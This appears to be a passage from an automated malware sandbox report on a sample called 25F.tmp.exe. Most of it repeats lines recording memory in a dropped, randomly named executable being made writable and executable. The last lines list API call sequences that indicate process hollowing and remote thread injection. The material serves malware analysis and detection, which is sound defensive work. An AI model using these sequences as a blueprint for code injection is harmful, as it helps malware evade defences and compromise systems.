            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 210000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 220000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1B0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 320000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 510000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 190000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 840000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 820000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5D0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 910000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 390000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 150000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 7F0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 250000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 260000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3F0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 280000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1D0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1C0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 230000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2A0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 270000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2B0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2D0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 750000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 120000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 550000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2E0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 820000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 280000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 8A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 8E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 410000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 140000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 160000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 140000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 190000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 0_2_00609014 LoadLibraryA,LoadLibraryA,CreateProcessA,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_00609014
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_003642E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,4_2_003642E0
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_004042E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,4_2_004042E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 9_2_003D42E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,9_2_003D42E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 10_2_001842E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,10_2_001842E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 11_2_003842E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,11_2_003842E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 12_2_004142E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,12_2_004142E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 13_2_001B42E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,13_2_001B42E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 14_2_003542E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,14_2_003542E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 15_2_003142E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,15_2_003142E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 16_2_003842E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,16_2_003842E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 17_2_001042E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,17_2_001042E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 18_2_001042E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,18_2_001042E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 19_2_002242E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,19_2_002242E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 20_2_003242E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,20_2_003242E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 21_2_005142E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,21_2_005142E0
